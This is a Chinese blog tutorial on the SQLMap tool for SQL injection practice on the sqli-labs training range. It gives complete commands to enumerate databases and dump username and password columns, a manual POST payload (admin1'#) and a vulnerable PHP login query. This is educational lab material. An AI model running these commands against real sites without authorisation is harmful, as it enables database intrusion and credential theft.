SQLMap自动化注入工具

PyHaVolask2025-12-03 10:44

工具介绍

SQLMap特点

  • Python开源项目
  • 全球最强大的SQL注入工具
  • 支持多种数据库和注入类型
  • 推荐在Linux/Kali环境使用

基础用法

1. 获取数据库名

bash 复制代码 
sqlmap -u "http://sqlilabs.njhack.xyz/Less-1/index.php?id=1" --dbs

参数说明

  • -u:目标URL
  • --dbs:枚举所有数据库

2. 获取表名

bash 复制代码 
sqlmap -u "http://sqlilabs.njhack.xyz/Less-1/index.php?id=1" -D security --tables

参数说明

  • -D security:指定数据库名
  • --tables:枚举表名

3. 获取列名

bash 复制代码 
sqlmap -u "http://sqlilabs.njhack.xyz/Less-1/index.php?id=1" -D security -T users --columns

参数说明

  • -T users:指定表名
  • --columns:枚举列名

4. 导出数据

bash 复制代码 
sqlmap -u "http://sqlilabs.njhack.xyz/Less-1/index.php?id=1" -D security -T users -C username,password --dump

参数说明

  • -C username,password:指定列名
  • --dump:导出数据

高级参数

完整命令格式

bash 复制代码 
sqlmap -u [目标URL] --dbs --batch --threads 10 --technique U

参数详解

  • --batch:自动选择默认选项,无需手动确认
  • --threads 10:使用10个线程(加快扫描速度)
  • --technique U:指定注入技术类型

注入技术类型(TECHNIQUE)

U - UNION查询注入

最常用、最快速的注入方式

bash 复制代码 
sqlmap -u [URL] --current-db --batch --threads 10 --technique U

特点

  • 需要能显示数据
  • 速度最快
  • 结果最直观

E - 报错注入(Error-based)

适用场景:无法找到显示位,但数据库错误会显示

bash 复制代码 
sqlmap -u [URL] --current-db --batch --threads 10 --technique E

原理

  • 通过构造特殊语句触发数据库报错
  • 在报错信息中包含查询结果
  • 对应靶场Less-5

B - 布尔盲注(Boolean-based)

适用场景:页面只有"有内容"和"无内容"两种状态

bash 复制代码 
sqlmap -u [URL] --current-db --batch --threads 10 --technique B

原理

  • 通过构造条件判断语句
  • 根据页面是否显示内容判断真假
  • 逐位猜解数据
  • 对应靶场Less-8

T - 时间盲注(Time-based)

适用场景:页面无任何显示差异

bash 复制代码 
sqlmap -u [URL] --current-db --batch --threads 10 --technique T -v 3

原理

  • 利用SLEEP()等函数延迟响应
  • 通过响应时间判断条件真假
  • 最慢但最隐蔽的方式
  • -v 3:显示详细调试信息

速度对比

复制代码 
U (最快) > E > B > T (最慢)

POST型注入

漏洞识别

靶场环境:Less-11

测试步骤

  1. 在登录表单输入:admin1
  2. 点击Submit提交
  3. 使用Burp Suite抓包
  4. 在用户名后添加'\测试

判断注入点

复制代码 
username: admin1'
password: admin1

如果报错,说明存在注入。

后端代码推测

php 复制代码 
<?php
$uname = $_POST['uname'];
$passwd = $_POST['passwd'];

$sql = "SELECT username, password FROM users 
        WHERE username='$uname' AND password='$passwd' 
        LIMIT 0,1";
?>

POST注入注释符 :使用#(井号)

测试Payload

复制代码 
username: admin1'#
password: 任意值

SQLMap POST注入

基本语法

bash 复制代码 
sqlmap -u [目标URL] --data "uname=admin1*&passwd=admin1&submit=Submit" --current-db --batch --threads 10 --technique U

关键参数

  • --data:POST数据
  • *:标记注入点(告诉SQLMap测试这个参数)

实战命令示例

UNION注入

bash 复制代码 
sqlmap -u "http://sqlilabs.njhack.xyz/Less-11/" \
--data "uname=admin1*&passwd=admin1&submit=Submit" \
--current-db --batch --threads 10 --technique U

报错注入

bash 复制代码 
sqlmap -u "http://sqlilabs.njhack.xyz/Less-11/" \
--data "uname=admin*&passwd=admin&submit=Submit" \
--current-db --batch --threads 10 --technique E

数据获取流程

  1. 抓取POST数据包
  2. 复制POST数据体(最后一行)
  3. 用双引号包裹
  4. 在注入点位置添加*
  5. 执行SQLMap命令
相关推荐
神梦流21 分钟前
GE 引擎的非标准数据流处理:稀疏张量与自定义算子在图优化中的语义保持
linux·运维·服务器
兜兜转转了多少年28 分钟前
从脚本到系统:2026 年 AI 代理驱动的 Shell 自动化
运维·人工智能·自动化
Lsir10110_1 小时前
【Linux】中断 —— 操作系统的运行基石
linux·运维·嵌入式硬件
Doro再努力2 小时前
【Linux操作系统12】Git版本控制与GDB调试:从入门到实践
linux·运维·服务器·git·vim
全栈工程师修炼指南2 小时前
Nginx | stream content 阶段:UDP 协议四层反向代理浅析与实践
运维·网络·网络协议·nginx·udp
Lsir10110_2 小时前
【Linux】进程信号(上半)
linux·运维·服务器
开开心心就好3 小时前
发票合并打印工具,多页布局设置实时预览
linux·运维·服务器·windows·pdf·harmonyos·1024程序员节
火车叼位3 小时前
脚本伪装:让 Python 与 Node.js 像原生 Shell 命令一样运行
运维·javascript·python
L543414463 小时前
告别代码堆砌匠厂架构让你的系统吞吐量翻倍提升
大数据·人工智能·架构·自动化·rpa
迎仔3 小时前
06-存储设备运维进阶:算力中心的存储管家
运维
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03OpenClaw Chrome扩展使用教程 - 浏览器中继控制04Linux下V2Ray安装配置指南05UV安装并设置国内源06openclaw配置教程(linux+局域网ollama)07使用 1panel面板 部署 php网站08Vue-skills的中文文档09让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南10从零搭建一个 PHP 登录注册系统(含完整源码)